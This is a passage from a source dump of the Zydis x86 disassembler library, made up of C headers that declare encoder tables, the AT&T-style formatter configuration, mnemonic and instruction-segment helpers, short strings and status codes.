107 | ZYDIS_SIZE_HINT_MAX_VALUE = ZYDIS_SIZE_HINT_OSZ,
108 | /**
109 | * The minimum number of bits required to represent all values of this enum.
110 | */
111 | ZYDIS_SIZE_HINT_REQUIRED_BITS = ZYAN_BITS_TO_REPRESENT(ZYDIS_SIZE_HINT_MAX_VALUE)
112 | } ZydisSizeHint;
113 |
114 | /**
115 | * Used in encoder's primary lookup table which allows to access a set of instruction definitions
116 | * for specified mnemonic in constant time.
117 | */
118 | typedef struct ZydisEncoderLookupEntry_
119 | {
120 | /**
121 | * Index to main array of `ZydisEncodableInstruction`.
122 | */
123 | ZyanU16 encoder_reference;
124 | /**
125 | * The number of entries.
126 | */
127 | ZyanU8 instruction_count;
128 | } ZydisEncoderLookupEntry;
129 |
130 | #pragma pack(push, 1)
131 |
132 | /**
133 | * This structure is encoder's internal representation of encodable instruction definition.
134 | */
135 | typedef struct ZydisEncodableInstruction_
136 | {
137 | /**
138 | * Index to one of decoder's instruction definition arrays.
139 | */
140 | ZyanU16 instruction_reference;
141 | /**
142 | * Compressed information about operand count and types. Operand count is stored in lowest bits.
143 | * Types of subsequent operands are stored in higher bits.
144 | */
145 | ZyanU16 operand_mask;
146 | /**
147 | * The instruction-opcode.
148 | */
149 | ZyanU8 opcode;
150 | /**
151 | * The mandatory ModR/M value.
152 | */
153 | ZyanU8 modrm;
154 | /**
155 | * The instruction-encoding.
156 | */
157 | ZyanU8 encoding ZYAN_BITFIELD(ZYDIS_INSTRUCTION_ENCODING_REQUIRED_BITS);
158 | /**
159 | * The opcode map.
160 | */
161 | ZyanU8 opcode_map ZYAN_BITFIELD(ZYDIS_OPCODE_MAP_REQUIRED_BITS);
162 | /**
163 | * The combination of allowed processor modes.
164 | */
165 | ZyanU8 modes ZYAN_BITFIELD(ZYDIS_WIDTH_REQUIRED_BITS);
166 | /**
167 | * The combination of allowed address sizes.
168 | */
169 | ZyanU8 address_sizes ZYAN_BITFIELD(ZYDIS_WIDTH_REQUIRED_BITS);
170 | /**
171 | * The combination of allowed operand sizes.
172 | */
173 | ZyanU8 operand_sizes ZYAN_BITFIELD(ZYDIS_WIDTH_REQUIRED_BITS);
174 | /**
175 | * The mandatory prefix.
176 | */
177 | ZyanU8 mandatory_prefix ZYAN_BITFIELD(ZYDIS_MANDATORY_PREFIX_REQUIRED_BITS);
178 | /**
179 | * True if `REX.W` is required for this definition.
180 | */
181 | ZyanU8 rex_w ZYAN_BITFIELD(1);
182 | /**
183 | * The vector length.
184 | */
185 | ZyanU8 vector_length ZYAN_BITFIELD(ZYDIS_MANDATORY_PREFIX_REQUIRED_BITS);
186 | /**
187 | * The accepted sizing hint.
188 | */
189 | ZyanU8 accepts_hint ZYAN_BITFIELD(ZYDIS_SIZE_HINT_REQUIRED_BITS);
190 | /**
191 | * Indicates that next instruction definition can be safely used instead of current one. This
192 | * is used with some `VEX` instructions to take advantage of 2-byte `VEX` prefix when possible.
193 | * 2-byte `VEX` allows to use high registers only when operand is encoded in `modrm_reg`
194 | * (high bit in `REX.R`). Encoder uses swappable definitions to take advantage of this
195 | * optimization opportunity.
196 | *
197 | * Second use of this field is to handle special case for `mov` instruction. This particular
198 | * conflict is described in detail inside `ZydisHandleSwappableDefinition`.
199 | */
200 | ZyanU8 swappable ZYAN_BITFIELD(1);
201 | } ZydisEncodableInstruction;
202 |
203 | #pragma pack(pop)
204 |
205 | /**
206 | * Contains information used by instruction size prediction algorithm inside
207 | * `ZydisEncoderEncodeInstructionAbsolute`.
208 | */
209 | typedef struct ZydisEncoderRelInfo_
210 | {
211 | /**
212 | * Sizes of instruction variants. First index is effective address size. Second index is
213 | * desired immediate size (8, 16 and 32 bits respectively).
214 | */
215 | ZyanU8 size[3][3];
216 | /**
217 | * See `ZydisSizeHint`.
218 | */
219 | ZyanU8 accepts_scaling_hints;
220 | /**
221 | * True if instruction accepts branch hint prefixes.
222 | */
223 | ZyanBool accepts_branch_hints;
224 | /**
225 | * True if instruction accepts bound (`BND`) prefix.
226 | */
227 | ZyanBool accepts_bound;
228 | } ZydisEncoderRelInfo;
229 |
230 | /**
231 | * Fetches array of `ZydisEncodableInstruction` structures and its size for given instruction
232 | * mnemonic.
233 | *
234 | * @param mnemonic Instruction mnemonic.
235 | * @param instruction This variable will receive a pointer to the array of
236 | * `ZydisEncodableInstruction` structures.
237 | *
238 | * @return Entry count (0 if function failed).
239 | */
240 | ZyanU8 ZydisGetEncodableInstructions(ZydisMnemonic mnemonic,
241 | const ZydisEncodableInstruction **instruction);
242 |
243 | /**
244 | * Fetches `ZydisEncoderRelInfo` record for given instruction mnemonic.
245 | *
246 | * @param mnemonic Instruction mnemonic.
247 | *
248 | * @return Pointer to `ZydisEncoderRelInfo` structure or `ZYAN_NULL` if instruction doesn't have
249 | * relative operands.
250 | */
251 | const ZydisEncoderRelInfo *ZydisGetRelInfo(ZydisMnemonic mnemonic);
252 |
253 | #endif /* ZYDIS_INTERNAL_ENCODERDATA_H */
254 |
--------------------------------------------------------------------------------
/inc/Zydis/Internal/FormatterATT.h:
--------------------------------------------------------------------------------
1 | /***************************************************************************************************
2 |
3 | Zyan Disassembler Library (Zydis)
4 |
5 | Original Author : Florian Bernd, Joel Hoener
6 |
7 | * Permission is hereby granted, free of charge, to any person obtaining a copy
8 | * of this software and associated documentation files (the "Software"), to deal
9 | * in the Software without restriction, including without limitation the rights
10 | * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | * copies of the Software, and to permit persons to whom the Software is
12 | * furnished to do so, subject to the following conditions:
13 | *
14 | * The above copyright notice and this permission notice shall be included in all
15 | * copies or substantial portions of the Software.
16 | *
17 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | * SOFTWARE.
24 |
25 | ***************************************************************************************************/
26 |
27 | /**
28 | * @file
29 | * Implements the `AT&T` style instruction-formatter.
30 | */
31 |
32 | #ifndef ZYDIS_FORMATTER_ATT_H
33 | #define ZYDIS_FORMATTER_ATT_H
34 |
35 | #include
36 | #include
37 | #include
38 |
39 | #ifdef __cplusplus
40 | extern "C" {
41 | #endif
42 |
43 | /* ============================================================================================== */
44 | /* Formatter functions */
45 | /* ============================================================================================== */
46 |
47 | /* ---------------------------------------------------------------------------------------------- */
48 | /* Instruction */
49 | /* ---------------------------------------------------------------------------------------------- */
50 |
51 | ZyanStatus ZydisFormatterATTFormatInstruction(const ZydisFormatter* formatter,
52 | ZydisFormatterBuffer* buffer, ZydisFormatterContext* context);
53 |
54 | /* ---------------------------------------------------------------------------------------------- */
55 | /* Operands */
56 | /* ---------------------------------------------------------------------------------------------- */
57 |
58 | ZyanStatus ZydisFormatterATTFormatOperandMEM(const ZydisFormatter* formatter,
59 | ZydisFormatterBuffer* buffer, ZydisFormatterContext* context);
60 |
61 | /* ---------------------------------------------------------------------------------------------- */
62 | /* Elemental tokens */
63 | /* ---------------------------------------------------------------------------------------------- */
64 |
65 | ZyanStatus ZydisFormatterATTPrintMnemonic(const ZydisFormatter* formatter,
66 | ZydisFormatterBuffer* buffer, ZydisFormatterContext* context);
67 |
68 | ZyanStatus ZydisFormatterATTPrintRegister(const ZydisFormatter* formatter,
69 | ZydisFormatterBuffer* buffer, ZydisFormatterContext* context, ZydisRegister reg);
70 |
71 | ZyanStatus ZydisFormatterATTPrintAddressABS(const ZydisFormatter* formatter,
72 | ZydisFormatterBuffer* buffer, ZydisFormatterContext* context);
73 |
74 | ZyanStatus ZydisFormatterATTPrintDISP(const ZydisFormatter* formatter,
75 | ZydisFormatterBuffer* buffer, ZydisFormatterContext* context);
76 |
77 | ZyanStatus ZydisFormatterATTPrintIMM(const ZydisFormatter* formatter,
78 | ZydisFormatterBuffer* buffer, ZydisFormatterContext* context);
79 |
80 | /* ---------------------------------------------------------------------------------------------- */
81 |
82 | /* ============================================================================================== */
83 | /* Fomatter presets */
84 | /* ============================================================================================== */
85 |
86 | /* ---------------------------------------------------------------------------------------------- */
87 | /* AT&T */
88 | /* ---------------------------------------------------------------------------------------------- */
89 |
90 | /**
91 | * The default formatter configuration for `AT&T` style disassembly.
92 | */
93 | static const ZydisFormatter FORMATTER_ATT =
94 | {
95 | /* style */ ZYDIS_FORMATTER_STYLE_ATT,
96 | /* force_memory_size */ ZYAN_FALSE,
97 | /* force_memory_seg */ ZYAN_FALSE,
98 | /* force_memory_scale */ ZYAN_TRUE,
99 | /* force_relative_branches */ ZYAN_FALSE,
100 | /* force_relative_riprel */ ZYAN_FALSE,
101 | /* print_branch_size */ ZYAN_FALSE,
102 | /* detailed_prefixes */ ZYAN_FALSE,
103 | /* addr_base */ ZYDIS_NUMERIC_BASE_HEX,
104 | /* addr_signedness */ ZYDIS_SIGNEDNESS_SIGNED,
105 | /* addr_padding_absolute */ ZYDIS_PADDING_AUTO,
106 | /* addr_padding_relative */ 2,
107 | /* disp_base */ ZYDIS_NUMERIC_BASE_HEX,
108 | /* disp_signedness */ ZYDIS_SIGNEDNESS_SIGNED,
109 | /* disp_padding */ 2,
110 | /* imm_base */ ZYDIS_NUMERIC_BASE_HEX,
111 | /* imm_signedness */ ZYDIS_SIGNEDNESS_AUTO,
112 | /* imm_padding */ 2,
113 | /* case_prefixes */ ZYDIS_LETTER_CASE_DEFAULT,
114 | /* case_mnemonic */ ZYDIS_LETTER_CASE_DEFAULT,
115 | /* case_registers */ ZYDIS_LETTER_CASE_DEFAULT,
116 | /* case_typecasts */ ZYDIS_LETTER_CASE_DEFAULT,
117 | /* case_decorators */ ZYDIS_LETTER_CASE_DEFAULT,
118 | /* hex_uppercase */ ZYAN_TRUE,
119 | /* hex_force_leading_number */ ZYAN_FALSE,
120 | /* number_format */
121 | {
122 | // ZYDIS_NUMERIC_BASE_DEC
123 | {
124 | // Prefix
125 | {
126 | /* string */ ZYAN_NULL,
127 | /* string_data */ ZYAN_DEFINE_STRING_VIEW(""),
128 | /* buffer */ { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 },
129 | },
130 | // Suffix
131 | {
132 | /* string */ ZYAN_NULL,
133 | /* string_data */ ZYAN_DEFINE_STRING_VIEW(""),
134 | /* buffer */ { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 },
135 | }
136 | },
137 | // ZYDIS_NUMERIC_BASE_HEX
138 | {
139 | // Prefix
140 | {
141 | /* string */ &FORMATTER_ATT.number_format[
142 | ZYDIS_NUMERIC_BASE_HEX][0].string_data,
143 | /* string_data */ ZYAN_DEFINE_STRING_VIEW("0x"),
144 | /* buffer */ { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 },
145 | },
146 | // Suffix
147 | {
148 | /* string */ ZYAN_NULL,
149 | /* string_data */ ZYAN_DEFINE_STRING_VIEW(""),
150 | /* buffer */ { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 },
151 | }
152 | }
153 | },
154 | /* func_pre_instruction */ ZYAN_NULL,
155 | /* func_post_instruction */ ZYAN_NULL,
156 | /* func_format_instruction */ &ZydisFormatterATTFormatInstruction,
157 | /* func_pre_operand */ ZYAN_NULL,
158 | /* func_post_operand */ ZYAN_NULL,
159 | /* func_format_operand_reg */ &ZydisFormatterBaseFormatOperandREG,
160 | /* func_format_operand_mem */ &ZydisFormatterATTFormatOperandMEM,
161 | /* func_format_operand_ptr */ &ZydisFormatterBaseFormatOperandPTR,
162 | /* func_format_operand_imm */ &ZydisFormatterBaseFormatOperandIMM,
163 | /* func_print_mnemonic */ &ZydisFormatterATTPrintMnemonic,
164 | /* func_print_register */ &ZydisFormatterATTPrintRegister,
165 | /* func_print_address_abs */ &ZydisFormatterATTPrintAddressABS,
166 | /* func_print_address_rel */ &ZydisFormatterBasePrintAddressREL,
167 | /* func_print_disp */ &ZydisFormatterATTPrintDISP,
168 | /* func_print_imm */ &ZydisFormatterATTPrintIMM,
169 | /* func_print_typecast */ ZYAN_NULL,
170 | /* func_print_segment */ &ZydisFormatterBasePrintSegment,
171 | /* func_print_prefixes */ &ZydisFormatterBasePrintPrefixes,
172 | /* func_print_decorator */ &ZydisFormatterBasePrintDecorator
173 | };
174 |
175 | /* ---------------------------------------------------------------------------------------------- */
176 |
177 | /* ============================================================================================== */
178 |
179 | #ifdef __cplusplus
180 | }
181 | #endif
182 |
183 | #endif // ZYDIS_FORMATTER_ATT_H
184 |
--------------------------------------------------------------------------------
/inc/Zydis/MetaInfo.h:
--------------------------------------------------------------------------------
1 | /***************************************************************************************************
2 |
3 | Zyan Disassembler Library (Zydis)
4 |
5 | Original Author : Florian Bernd
6 |
7 | * Permission is hereby granted, free of charge, to any person obtaining a copy
8 | * of this software and associated documentation files (the "Software"), to deal
9 | * in the Software without restriction, including without limitation the rights
10 | * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | * copies of the Software, and to permit persons to whom the Software is
12 | * furnished to do so, subject to the following conditions:
13 | *
14 | * The above copyright notice and this permission notice shall be included in all
15 | * copies or substantial portions of the Software.
16 | *
17 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | * SOFTWARE.
24 |
25 | ***************************************************************************************************/
26 |
27 | /**
28 | * @file
29 | * @brief
30 | */
31 |
32 | #ifndef ZYDIS_METAINFO_H
33 | #define ZYDIS_METAINFO_H
34 |
35 | #include
36 |
37 | #ifdef __cplusplus
38 | extern "C" {
39 | #endif
40 |
41 | /* ============================================================================================== */
42 | /* Enums and types */
43 | /* ============================================================================================== */
44 |
45 | #include
46 | #include
47 | #include
48 |
49 | /* ============================================================================================== */
50 | /* Exported functions */
51 | /* ============================================================================================== */
52 |
53 | /**
54 | * Returns the specified instruction category string.
55 | *
56 | * @param category The instruction category.
57 | *
58 | * @return The instruction category string or `ZYAN_NULL`, if an invalid category was passed.
59 | */
60 | ZYDIS_EXPORT const char* ZydisCategoryGetString(ZydisInstructionCategory category);
61 |
62 | /**
63 | * Returns the specified isa-set string.
64 | *
65 | * @param isa_set The isa-set.
66 | *
67 | * @return The isa-set string or `ZYAN_NULL`, if an invalid isa-set was passed.
68 | */
69 | ZYDIS_EXPORT const char* ZydisISASetGetString(ZydisISASet isa_set);
70 |
71 | /**
72 | * Returns the specified isa-extension string.
73 | *
74 | * @param isa_ext The isa-extension.
75 | *
76 | * @return The isa-extension string or `ZYAN_NULL`, if an invalid isa-extension was passed.
77 | */
78 | ZYDIS_EXPORT const char* ZydisISAExtGetString(ZydisISAExt isa_ext);
79 |
80 | /* ============================================================================================== */
81 |
82 | #ifdef __cplusplus
83 | }
84 | #endif
85 |
86 | #endif /* ZYDIS_METAINFO_H */
87 |
--------------------------------------------------------------------------------
/inc/Zydis/Mnemonic.h:
--------------------------------------------------------------------------------
1 | /***************************************************************************************************
2 |
3 | Zyan Disassembler Library (Zydis)
4 |
5 | Original Author : Florian Bernd
6 |
7 | * Permission is hereby granted, free of charge, to any person obtaining a copy
8 | * of this software and associated documentation files (the "Software"), to deal
9 | * in the Software without restriction, including without limitation the rights
10 | * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | * copies of the Software, and to permit persons to whom the Software is
12 | * furnished to do so, subject to the following conditions:
13 | *
14 | * The above copyright notice and this permission notice shall be included in all
15 | * copies or substantial portions of the Software.
16 | *
17 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | * SOFTWARE.
24 |
25 | ***************************************************************************************************/
26 |
27 | /**
28 | * @file
29 | * Mnemonic constant definitions and helper functions.
30 | */
31 |
32 | #ifndef ZYDIS_MNEMONIC_H
33 | #define ZYDIS_MNEMONIC_H
34 |
35 | #include
36 | #include
37 |
38 | #ifdef __cplusplus
39 | extern "C" {
40 | #endif
41 |
42 | /* ============================================================================================== */
43 | /* Enums and types */
44 | /* ============================================================================================== */
45 |
46 | #include
47 |
48 | /* ============================================================================================== */
49 | /* Exported functions */
50 | /* ============================================================================================== */
51 |
52 | /**
53 | * @addtogroup mnemonic Mnemonic
54 | * Functions for retrieving mnemonic names.
55 | * @{
56 | */
57 |
58 | /**
59 | * Returns the specified instruction mnemonic string.
60 | *
61 | * @param mnemonic The mnemonic.
62 | *
63 | * @return The instruction mnemonic string or `ZYAN_NULL`, if an invalid mnemonic was passed.
64 | */
65 | ZYDIS_EXPORT const char* ZydisMnemonicGetString(ZydisMnemonic mnemonic);
66 |
67 | /**
68 | * Returns the specified instruction mnemonic as `ZydisShortString`.
69 | *
70 | * @param mnemonic The mnemonic.
71 | *
72 | * @return The instruction mnemonic string or `ZYAN_NULL`, if an invalid mnemonic was passed.
73 | *
74 | * The `buffer` of the returned struct is guaranteed to be zero-terminated in this special case.
75 | */
76 | ZYDIS_EXPORT const ZydisShortString* ZydisMnemonicGetStringWrapped(ZydisMnemonic mnemonic);
77 |
78 | /**
79 | * @}
80 | */
81 |
82 | /* ============================================================================================== */
83 |
84 | #ifdef __cplusplus
85 | }
86 | #endif
87 |
88 | #endif /* ZYDIS_MNEMONIC_H */
89 |
--------------------------------------------------------------------------------
/inc/Zydis/Segment.h:
--------------------------------------------------------------------------------
1 | /***************************************************************************************************
2 |
3 | Zyan Disassembler Library (Zydis)
4 |
5 | Original Author : Florian Bernd
6 |
7 | * Permission is hereby granted, free of charge, to any person obtaining a copy
8 | * of this software and associated documentation files (the "Software"), to deal
9 | * in the Software without restriction, including without limitation the rights
10 | * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | * copies of the Software, and to permit persons to whom the Software is
12 | * furnished to do so, subject to the following conditions:
13 | *
14 | * The above copyright notice and this permission notice shall be included in all
15 | * copies or substantial portions of the Software.
16 | *
17 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | * SOFTWARE.
24 |
25 | ***************************************************************************************************/
26 |
27 | /**
28 | * @file
29 | * Functions and types providing encoding information about individual instruction bytes.
30 | */
31 |
32 | #ifndef ZYDIS_SEGMENT_H
33 | #define ZYDIS_SEGMENT_H
34 |
35 | #include
36 | #include
37 | #include
38 |
39 | #ifdef __cplusplus
40 | extern "C" {
41 | #endif
42 |
43 | /**
44 | * @addtogroup segment Segment
45 | * Functions and types providing encoding information about individual instruction bytes.
46 | * @{
47 | */
48 |
49 | /* ============================================================================================== */
50 | /* Macros */
51 | /* ============================================================================================== */
52 |
53 | /* ---------------------------------------------------------------------------------------------- */
54 | /* Constants */
55 | /* ---------------------------------------------------------------------------------------------- */
56 |
57 | #define ZYDIS_MAX_INSTRUCTION_SEGMENT_COUNT 9
58 |
59 | /* ---------------------------------------------------------------------------------------------- */
60 |
61 | /* ============================================================================================== */
62 | /* Enums and types */
63 | /* ============================================================================================== */
64 |
65 | /**
66 | * Defines the `ZydisInstructionSegment` struct.
67 | */
68 | typedef enum ZydisInstructionSegment_
69 | {
70 | ZYDIS_INSTR_SEGMENT_NONE,
71 | /**
72 | * The legacy prefixes (including ignored `REX` prefixes).
73 | */
74 | ZYDIS_INSTR_SEGMENT_PREFIXES,
75 | /**
76 | * The effective `REX` prefix byte.
77 | */
78 | ZYDIS_INSTR_SEGMENT_REX,
79 | /**
80 | * The `XOP` prefix bytes.
81 | */
82 | ZYDIS_INSTR_SEGMENT_XOP,
83 | /**
84 | * The `VEX` prefix bytes.
85 | */
86 | ZYDIS_INSTR_SEGMENT_VEX,
87 | /**
88 | * The `EVEX` prefix bytes.
89 | */
90 | ZYDIS_INSTR_SEGMENT_EVEX,
91 | /**
92 | * The `MVEX` prefix bytes.
93 | */
94 | ZYDIS_INSTR_SEGMENT_MVEX,
95 | /**
96 | * The opcode bytes.
97 | */
98 | ZYDIS_INSTR_SEGMENT_OPCODE,
99 | /**
100 | * The `ModRM` byte.
101 | */
102 | ZYDIS_INSTR_SEGMENT_MODRM,
103 | /**
104 | * The `SIB` byte.
105 | */
106 | ZYDIS_INSTR_SEGMENT_SIB,
107 | /**
108 | * The displacement bytes.
109 | */
110 | ZYDIS_INSTR_SEGMENT_DISPLACEMENT,
111 | /**
112 | * The immediate bytes.
113 | */
114 | ZYDIS_INSTR_SEGMENT_IMMEDIATE,
115 |
116 | /**
117 | * Maximum value of this enum.
118 | */
119 | ZYDIS_INSTR_SEGMENT_MAX_VALUE = ZYDIS_INSTR_SEGMENT_IMMEDIATE,
120 | /**
121 | * The minimum number of bits required to represent all values of this enum.
122 | */
123 | ZYDIS_INSTR_SEGMENT_REQUIRED_BITS = ZYAN_BITS_TO_REPRESENT(ZYDIS_INSTR_SEGMENT_MAX_VALUE)
124 | } ZydisInstructionSegment;
125 |
126 | /**
127 | * Defines the `ZydisInstructionSegments` struct.
128 | */
129 | typedef struct ZydisInstructionSegments_
130 | {
131 | /**
132 | * The number of logical instruction segments.
133 | */
134 | ZyanU8 count;
135 | struct
136 | {
137 | /**
138 | * The type of the segment.
139 | */
140 | ZydisInstructionSegment type;
141 | /**
142 | * The offset of the segment relative to the start of the instruction (in bytes).
143 | */
144 | ZyanU8 offset;
145 | /**
146 | * The size of the segment, in bytes.
147 | */
148 | ZyanU8 size;
149 | } segments[ZYDIS_MAX_INSTRUCTION_SEGMENT_COUNT];
150 | } ZydisInstructionSegments;
151 |
152 | /* ============================================================================================== */
153 | /* Exported functions */
154 | /* ============================================================================================== */
155 |
156 | /**
157 | * Returns offsets and sizes of all logical instruction segments (e.g. `OPCODE`,
158 | * `MODRM`, ...).
159 | *
160 | * @param instruction A pointer to the `ZydisDecodedInstruction` struct.
161 | * @param segments Receives the instruction segments information.
162 | *
163 | * @return A zyan status code.
164 | */
165 | ZYDIS_EXPORT ZyanStatus ZydisGetInstructionSegments(const ZydisDecodedInstruction* instruction,
166 | ZydisInstructionSegments* segments);
167 |
168 | /* ============================================================================================== */
169 |
170 | /**
171 | * @}
172 | */
173 |
174 | #ifdef __cplusplus
175 | }
176 | #endif
177 |
178 | #endif /* ZYDIS_SEGMENT_H */
179 |
--------------------------------------------------------------------------------
/inc/Zydis/ShortString.h:
--------------------------------------------------------------------------------
1 | /***************************************************************************************************
2 |
3 | Zyan Disassembler Library (Zydis)
4 |
5 | Original Author : Florian Bernd
6 |
7 | * Permission is hereby granted, free of charge, to any person obtaining a copy
8 | * of this software and associated documentation files (the "Software"), to deal
9 | * in the Software without restriction, including without limitation the rights
10 | * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | * copies of the Software, and to permit persons to whom the Software is
12 | * furnished to do so, subject to the following conditions:
13 | *
14 | * The above copyright notice and this permission notice shall be included in all
15 | * copies or substantial portions of the Software.
16 | *
17 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | * SOFTWARE.
24 |
25 | ***************************************************************************************************/
26 |
27 | /**
28 | * @file
29 | * Defines the immutable and storage-efficient `ZydisShortString` struct, which
30 | * is used to store strings in the generated tables.
31 | */
32 |
33 | #ifndef ZYDIS_SHORTSTRING_H
34 | #define ZYDIS_SHORTSTRING_H
35 |
36 | #include
37 | #include
38 |
39 | #ifdef __cplusplus
40 | extern "C" {
41 | #endif
42 |
43 | /* ============================================================================================== */
44 | /* Enums and types */
45 | /* ============================================================================================== */
46 |
47 | #if !defined(ZYAN_APPLE)
48 | # pragma pack(push, 1)
49 | #endif
50 |
51 | /**
52 | * Defines the `ZydisShortString` struct.
53 | *
54 | * This compact struct is mainly used for internal string-tables to save up some bytes.
55 | *
56 | * All fields in this struct should be considered as "private". Any changes may lead to unexpected
57 | * behavior.
58 | */
59 | typedef struct ZydisShortString_
60 | {
61 | /**
62 | * The buffer that contains the actual (null-terminated) string.
63 | */
64 | const char* data;
65 | /**
66 | * The length (number of characters) of the string (without 0-termination).
67 | */
68 | ZyanU8 size;
69 | } ZydisShortString;
70 |
71 | #if !defined(ZYAN_APPLE)
72 | # pragma pack(pop)
73 | #endif
74 |
75 | /* ============================================================================================== */
76 | /* Macros */
77 | /* ============================================================================================== */
78 |
79 | /**
80 | * Declares a `ZydisShortString` from a static C-style string.
81 | *
82 | * @param string The C-string constant.
83 | */
84 | #define ZYDIS_MAKE_SHORTSTRING(string) \
85 | { string, sizeof(string) - 1 }
86 |
87 | /* ============================================================================================== */
88 |
89 | #ifdef __cplusplus
90 | }
91 | #endif
92 |
93 | #endif /* ZYDIS_SHORTSTRING_H */
94 |
--------------------------------------------------------------------------------
/inc/Zydis/Status.h:
--------------------------------------------------------------------------------
1 | /***************************************************************************************************
2 |
3 | Zyan Disassembler Library (Zydis)
4 |
5 | Original Author : Florian Bernd
6 |
7 | * Permission is hereby granted, free of charge, to any person obtaining a copy
8 | * of this software and associated documentation files (the "Software"), to deal
9 | * in the Software without restriction, including without limitation the rights
10 | * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | * copies of the Software, and to permit persons to whom the Software is
12 | * furnished to do so, subject to the following conditions:
13 | *
14 | * The above copyright notice and this permission notice shall be included in all
15 | * copies or substantial portions of the Software.
16 | *
17 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | * SOFTWARE.
24 |
25 | ***************************************************************************************************/
26 |
27 | /**
28 | * @file
29 | * Status code definitions and check macros.
30 | */
31 |
32 | #ifndef ZYDIS_STATUS_H
33 | #define ZYDIS_STATUS_H
34 |
35 | #include
36 |
37 | #ifdef __cplusplus
38 | extern "C" {
39 | #endif
40 |
41 | /* ============================================================================================== */
42 | /* Status codes */
43 | /* ============================================================================================== */
44 |
45 | /* ---------------------------------------------------------------------------------------------- */
46 | /* Module IDs */
47 | /* ---------------------------------------------------------------------------------------------- */
48 |
49 | /**
50 | * The zydis module id.
51 | */
52 | #define ZYAN_MODULE_ZYDIS 0x002u
53 |
54 | /* ---------------------------------------------------------------------------------------------- */
55 | /* Status codes */
56 | /* ---------------------------------------------------------------------------------------------- */
57 |
58 | /* ---------------------------------------------------------------------------------------------- */
59 | /* Decoder */
60 | /* ---------------------------------------------------------------------------------------------- */
61 |
62 | /**
63 | * An attempt was made to read data from an input data-source that has no more
64 | * data available.
65 | */
66 | #define ZYDIS_STATUS_NO_MORE_DATA \
67 | ZYAN_MAKE_STATUS(1u, ZYAN_MODULE_ZYDIS, 0x00u)
68 |
69 | /**
70 | * An general error occured while decoding the current instruction. The
71 | * instruction might be undefined.
72 | */
73 | #define ZYDIS_STATUS_DECODING_ERROR \
74 | ZYAN_MAKE_STATUS(1u, ZYAN_MODULE_ZYDIS, 0x01u)
75 |
76 | /**
